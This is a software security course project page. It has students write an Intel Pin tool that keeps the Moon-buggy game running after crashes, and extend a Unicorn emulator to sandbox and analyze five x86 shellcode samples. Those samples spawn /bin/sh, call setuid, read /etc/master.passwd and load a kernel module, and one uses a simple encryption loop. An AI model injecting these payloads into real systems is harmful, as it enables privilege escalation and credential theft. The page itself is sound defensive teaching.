--- title: 'Project' tags: enee759-spring24 --- * Please use **[ELMS-Canvas](https://elms.umd.edu/)** to submit your projects. * Deadlines are posted in the [ELMS-Canvas](https://elms.umd.edu/). * Feedback will be available after the grading. ## Preparation: Installing Intel Pin * If your Linux system does not have Intel Pin installed. (If you have downloaded VirtualBox VM, it would have Pin installed, so skip this part). * Download the https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh and run it. ```shell $ cd $ wget https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh $ chmod +x pin.sh $ ./pin.sh ``` 1. It will download, unzip, and install the Pin. 2. After the installation, close the terminal and open a new terminal. 3. If it can run the `pin` binary in your home folder, the installation is successful. ### Documents for Pin * [**Intel Pin for Perturbing Program Executions: Examples**](https://hackmd.io/@yonghwikwon/HJoOIh9y5) * [Please see this page to turn off ASLR (Address Space Layout Randomization)](https://hackmd.io/@yonghwikwon/Hkrqi7756). * Intel Official Documents: [Pin User Manual](https://software.intel.com/sites/landingpage/pintool/docs/98484/Pin/html/index.html), [Pin API Reference](https://software.intel.com/sites/landingpage/pintool/docs/98484/Pin/html/group__API__REF.html) ## Project 1: Zombie Moon-buggy ### Background <iframe src="https://drive.google.com/file/d/1wECnH-CmQCr9Llj4mimmKpEbUEFbz4zX/preview" width="640" height="380" allow="autoplay" style="border:2px solid gray;"></iframe> * [Watch This Video](https://drive.google.com/file/d/1wECnH-CmQCr9Llj4mimmKpEbUEFbz4zX/view?usp=sharing) You are given the Moon-buggy game. Your goal is to use Intel Pin to make the moon buggy keep going even after crashes. ### Full Description First, [watch the video](https://drive.google.com/file/d/1wECnH-CmQCr9Llj4mimmKpEbUEFbz4zX/view?usp=sharing). It shows **two moon buggy executions**. * The first execution is the original game without any execution perturbation. You will see it crashes if you do not properly jump to avoid the holes on the ground. * The second execution is the original game with a Pin tool perturbing the execution to disable the crash detection logic. It shows **even after it crashes**, **the buggy keeps going**. * Even though the buggy looks damaged, it still functions (e.g., keep going and firing). You need to figure out how to make your own Pin tool that achieves the same goal: make the moon buggy keep going after crashes. You are supposed to figure this out by yourself by analyzing the source code. * Hints: You need to look at "**crash detection**" mechanism. In other words, you need to focus, **how the program detects the buggy ran into the holes** and **crashes** the buggy. ### Resources * [Download Moon-buggy Program](https://yonghwi-kwon.github.io/class/softsec/project/moon-buggy.zip) * How to compile and run the moon-buggy program * **Download** and **extract** it. * **Install** required **packages**: **autoconf**, **automake**, **texinfo**, **libncurses5-dev**, **libncursesw5-dev** ```shell $ sudo apt-get install autoconf automake texinfo $ sudo apt-get install libncurses5-dev libncursesw5-dev ``` * **Run** the following **commands** ```shell $ ./autogen.sh $ ./configure $ make ``` * Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh * The below script will create a directory and download/unzip all the required files. ```shell $ wget https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh $ chmod +x prj1.sh $ ./prj1.sh ``` ### Extra Challenge The buggy has a laser that can be fired by key `a`. Whenever you do, it would deduct your game score. Can you make it increase the score? (e.g., everytime you use the laser, you gain 10000 scores) * Hints: You need to **find out** how the **score** is **modified** regarding the laser. ### What to submit 1. Your Pin tool **code** (please submit a single C/C++ file). 2. **Report** that includes (1) High-level **descriptions** of how **your Pin tool** works. (2) **Instructions** and **memory locations** (i.e., **variables**) you have changed to make the game invincible. Those are identified via manual analysis. (3) **Implementation strategies** of your Pin tool. ## Project 2: Emulating Partial Program (Shellcode) ### Backgrounds **Remote exploitation** of vulnerable program is a common tactic in cyber attacks. Typically, an attacker sends **maliciously crafted inputs** to a vulnerable program. Such an input often consists of two parts: a **malicious payload**, which will be executed after a successful exploitation, and an **input exploits the vulnerability** to hijack the control flow to redirect it to the injected payload. ![image](https://hackmd.io/_uploads/Hki_oh9np.png) The above figure shows an example scenario. * First, an attacker sends a malicious payload to a vulnerable program, typically through a legitimate channels. * Any code that allocates the memory and fills the data from the attack can be used. * Attackers typically repeat this process many time so that it can spread many instances of malicious payload on the memory. * Second, a vulnerability triggering input is sent to the program to trigger a vulnerability and hijack the control flow to execute the injected payload. * Then, it runs the injected malicious payload (those in the green boxes), which will create a process of `/bin/sh`. Since the malicious payload is essentially code bytes of a sequence of instructions, it can be anything. In practice, there are two typical forms of malicious payload: shellcode or ROP. In this project, we only focus on shellcode. The following website gives a few examples of popular shellcode: http://shell-storm.org/shellcode/. ### What is this project about? Assume that you obtain a potential malicious payload (e.g., from network logs), you would like to know what they are doing. Executing them on a real machine or VM is a viable option, but it will also harm the entire VM or machine if the exploitation is successful. **Sandboxing** is a technique that can run the program while preventing the target program making any harm to the host system. In practice, sandboxing is commonly used to execute potentially malicious code or program as it can observe malicious actions without harming the host system. This project asks you to create a **sandboxing tool** that **execute them** safely **using code emulation techniques**. Specifically, give a sequence of code bytes (i.e., instructions), you **run them** and **report what actions they make** (e.g., call a system call, doing a particular computations, etc.). ### Given Five shellcodes You are given the below shellcode examples. Your goal is to make your program properly interpret their executions (e.g., what system calls were made with which arguments): * Example 1: `CODE_EXAMPLE1` ``` \x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0 \x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1 ``` * Example 2: `CODE_EXAMPLE2` ``` \x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80 ``` * Example 3: `CODE_EXAMPLE3` ``` \x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62 \x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x0b\x50\xcd\x80\x50\x50\xcd \x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61 \x73\x73\x77\x64 ``` * Example 4: `CODE_EXAMPLE4` ``` \xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f \x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57 \x53\x50\xb0\x0b\xcd\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64 \x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f ``` * Example 5: `CODE_EXAMPLE5` ``` \x31\xd2\xeb\x0e\x31\xdb\x5b\xb1\x19\x83\x2c\x1a\x01\x42\xe2\xf9\xeb\x05\xe8\xed \xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x32\xdc\x8a\xe4 \x51\x55\x54\x51\xb1\x0c\xce\x81 ``` ### Given program You are given to a program `emul.py` which leverages the unicorn framework to run a given shellcode and produce executed instructions and results. #### Already supported system calls The program is already capable of executing a simple shellcode that does not cause any errors and uses a few system calls. | Syscall Number | Syscall Name | | -------- | -------- | | 1 | sys_exit | | 4 | sys_write | | 11 | sys_execv | | 48 | sys_signal | #### Already supported code examples The program is already capable of running the first two shellcode samples: `CODE_EXAMPLE1` and `CODE_EXAMPLE2`. The below screenshot is an example of executing `CODE_EXAMPLE1` with the provided program: > ![](https://i.imgur.com/P1ZcOfF.png) The program is configured as follows: * Shellcode exists from the address of `0x1000000` * Stack exists from the address of `0x1200000` * The shellcode example 1 is 39 bytes, where obviously many of them did not executed. * The below figure visualizes executed code (in red text/box). Bytes underlined together indicate bytes for each instruction. Arrows mean control flow changes. * Observe that there are still many instructions uncovered (which will be handled by the `continue` command below). * > ![](https://i.imgur.com/efzGtxj.png) * The program already supports the `continue` command, that can execute the remaining instructions that are not covered. * > ![](https://i.imgur.com/pONO63e.png) * Running with `continue` two more times will give you the following output, meaning that there *no remaining instructions to execute*. * > ![](https://i.imgur.com/KqbRpWm.png) * To understand how `continue` is implemented, search `inst_remain` variable in `project3.py` and check the related code. #### Not supported examples While Code Example 1 and 2 are already supported, **Example 3, 4, and 5** are **not** supported correctly. Your goal is to add the code to support them. Here is the list of challenges and potential solutions. #### Example 3 and 4 * System call 0x17 is not supported. * > ![](https://i.imgur.com/0qy1X5s.png) * 0x17 is SYS_SETUID. It takes a single argument which is passed via EBX register. * [Optional] System call 0x0 is not supported * > ![](https://i.imgur.com/3Qr8EZO.png) * It is up to you to support this or not. Simply adding a `elif` for the system call 0 and print a message (not an error message) would be sufficient. * The below instructions are in fact a string. This is already used in a previous system call. When we detect a string is executed as an instruction, print out a message that it is executing a string, hence no need to analyze the outcomes. * > ![](https://i.imgur.com/fpDtgyv.png) * Expected output (Your goal is to change the problem to behave like the below screenshot; printing `Are we executing a string?` when an address that is known to be a string is executed): * > ![](https://i.imgur.com/KJAyaAd.png) #### Example 5 Example 5's shellcode is encrypted. The below is the shellcode. ```asm 0: 31 d2 xor edx,edx 2: eb 0e jmp 0x12 4: 31 db xor ebx,ebx 6: 5b pop ebx 7: b1 19 mov cl,0x19 9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1 d: 42 inc edx e: e2 f9 loop 0x9 10: eb 05 jmp 0x17 12: e8 ed ff ff ff call 0x4 17: 32 c1 xor al,cl 19: 51 push ecx 1a: 69 30 30 74 69 69 imul esi,DWORD PTR [eax],0x69697430 20: 30 63 6a xor BYTE PTR [ebx+0x6a],ah 23: 6f outs dx,DWORD PTR ds:[esi] 24: 32 dc xor bl,ah 26: 8a e4 mov ah,ah 28: 51 push ecx 29: 55 push ebp 2a: 54 push esp 2b: 51 push ecx 2c: b1 0c mov cl,0xc 2e: ce into 2f: 81 .byte 0x81 ``` Observe that the execution flow: 0 -> 2 -> 12 -> 4 -> 6 -> 7 -> 9 -> d -> ... In particular, see the loop between `9` to `e`. ```asm 9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1 d: 42 inc edx e: e2 f9 loop 0x9 ``` The loop does a very simple decryption (value = value - 1), where the target buffer of this decryption is the code from `17`. ```asm 0: 31 d2 xor edx,edx 2: eb 0e jmp 0x12 ----------------------------| 4: 31 db xor ebx,ebx <------------------------|--| 6: 5b pop ebx | | 7: b1 19 mov cl,0x19 | | 9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1 | | d: 42 inc edx | | e: e2 f9 loop 0x9 | | 10: eb 05 jmp 0x17 | | 12: e8 ed ff ff ff call 0x4 <---------------------------|--| -------------------------------------------- 17: 32 c1 xor al,cl ... ``` If we manually apply the decryption, we get the following code: ```asm 0: 31 d2 xor edx,edx 2: eb 0e jmp 0x12 4: 31 db xor ebx,ebx 6: 5b pop ebx 7: b1 19 mov cl,0x19 9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1 d: 42 inc edx e: e2 f9 loop 0x9 10: eb 05 jmp 0x17 12: e8 ed ff ff ff call 0x4 -------------------------------------------- 17: 31 c0 xor eax,eax 19: 50 push eax 1a: 68 2f 2f 73 68 push 0x68732f2f 1f: 68 2f 62 69 6e push 0x6e69622f 24: 31 db xor ebx,ebx 26: 89 e3 mov ebx,esp 28: 50 push eax 29: 54 push esp 2a: 53 push ebx 2b: 50 push eax 2c: b0 0b mov al,0xb 2e: cd 80 int 0x80 ``` Now, your goal is to improve the program to handle this code. If you run the `project3.py` that we modified so far, you will get the following screenshot. > ![](https://i.imgur.com/DDuR968.png) Currently, the program stops analysis if it encounters the same instruction twice within the same execution. See the below code in `hook_code()`. ```python= # callback for tracing instructions def hook_code(uc, address, size, user_data): ... elif address in inst_executed_local: if address in cnt_repeated: cnt_repeated[address] = cnt_repeated[address] + 1 else: cnt_repeated[address] = 1 output = "Already covered (stop analysis):: addr %x (repeated: %d)" % (address, cnt_repeated[address]) out(output) uc.emu_stop() return ``` This code will terminate the analysis `uc.emu_stop()` when there is any instruction executed more than once (see the condition at line 4). As we saw, the decryption requires a loop. So, you have to allow them to execute instructions repeatedly. In this homework, you are asked to run each instruction up to 100 times. After you do, we get the following result: > ![](https://i.imgur.com/gM4A0Ef.png) Now, we can execute the first system call but, `continue` for the decrypted code does not work. ![](https://i.imgur.com/tnRtUk7.png) Observe that the code is the original code, that are not correctly decrypted. This is because when we run the program again, we lost the previous memory state that has the decrypted code. The last piece of this project is to save the memory state at the end of the execution and load them in the next run. The final outcome should allow you to run the program twice more, covering SYS_EXECVE twice with different arguments. > ![](https://i.imgur.com/lgv8Zhu.png) ### What to do 1. Download the unicorn framework. 2. Download the `emul.py` and `emul_util.py`. Put them in the `bindings` folder. * [emul.py](https://yonghwi-kwon.github.io/class/softsec/project/emul.py) * [emul_util.py](https://yonghwi-kwon.github.io/class/softsec/project/emul_util.py) 3. Follow the above description and the lecture video to improve the program so that it can handle all the five example shellcodes. ### Resources * Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh * The below script will create a directory and download/unzip all the required files. ```shell $ wget https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh $ chmod +x prj2.sh $ ./prj2.sh ``` ### What to submit 1. Final source code 2. Screenshots of each example shellcode running correctly on your terminal.